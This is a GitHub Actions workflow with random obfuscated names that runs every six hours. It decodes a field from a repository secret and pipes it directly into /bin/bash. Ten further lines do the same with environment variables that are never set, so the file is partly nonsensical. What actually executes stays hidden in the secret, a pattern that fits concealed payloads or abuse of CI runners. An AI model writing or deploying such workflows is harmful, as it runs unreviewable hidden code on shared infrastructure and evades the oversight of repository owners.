name: caocao19870105
on:
  workflow_dispatch:
  schedule:
    - cron: '34 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caocao19870105
        env:
          sfvi952: ${{ secrets.sfvi952 }}
        run: |
          echo $sfvi952 | jq -r .oy764 | /bin/bash
          echo $abhrd51160 | jq -r .dxgx7862 | /bin/bash
          echo $rbh22 | jq -r .h144 | /bin/bash
          echo $l17 | jq -r .gnpk5856 | /bin/bash
          echo $k872 | jq -r .fekp901 | /bin/bash
          echo $v0 | jq -r .j10074 | /bin/bash
          echo $coc372 | jq -r .c53 | /bin/bash
          echo $vork064 | jq -r .ozr3 | /bin/bash
          echo $xwmr66 | jq -r .rfivv53613 | /bin/bash
          echo $uaez773 | jq -r .ztp93 | /bin/bash
          echo $jx5 | jq -r .gz30572 | /bin/bash

